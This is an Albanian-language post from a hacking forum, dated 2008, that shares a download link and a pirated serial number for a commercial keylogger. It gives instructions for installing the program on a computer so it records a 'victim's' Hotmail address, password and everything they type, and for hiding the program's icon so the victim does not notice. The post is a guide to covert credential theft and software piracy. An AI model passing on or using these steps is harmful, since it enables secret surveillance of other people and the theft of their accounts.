ForumPortalCalendarPytësoriKërkoLista AnëtarëveGrupet e AnëtarëveRegjistrohuidentifikimi

Share | 
 

 NJe menyr me mar paswordat ne hotmail po edhe tjer pasword Vetem ne At Pc Qe E Instal

Shko poshtë 
AutoriMesazh
N!T!
V.I.P.
V.I.P.
avatar

Numri i postimeve : 153
Age : 23
Nga Jeni : strellci
Registration date : 20/12/2008

MesazhTitulli: NJe menyr me mar paswordat ne hotmail po edhe tjer pasword Vetem ne At Pc Qe E Instal   Sun Dec 21, 2008 10:35 am

name; freeserials.com sn; HATO-QBDN-BEPR-PPPG
Mund te maresh paswordin vetem ne at kompjuter qe e instalon ket program pasi ta instalosh e sheh ne anen e djatht te kompjuterit nje ikon me disa ngjyra viktima nese e hap emailin ne at kompjuter aty ruhet emaili dhe paswordi i tij edhe krejt qka ai shkrun Nese don ta fshehesh at ikon mos me pa viktima CliCko CTRL ALT edhe L e prek dhe ajo fshehet, me te njejtat pulla shfaqet mundesh edhe pasword mi ngjit mbi ikon klikon me anen e djath e she ku shkrun password dhe shenon nje pasword


Kodi:
http://www.blazingtools.com/downloads/i_bpk2003.exe
Mbrapsht në krye Shko poshtë
Shiko profilin e anëtarit http://www.dj-niti-a.piczo.com
 
NJe menyr me mar paswordat ne hotmail po edhe tjer pasword Vetem ne At Pc Qe E Instal
Mbrapsht në krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti përgjigjeni temave të këtij forumi
 :: ¸.·´¯) Paneli i Kontrollit (¯`·., :: Hacking-
Kërce tek: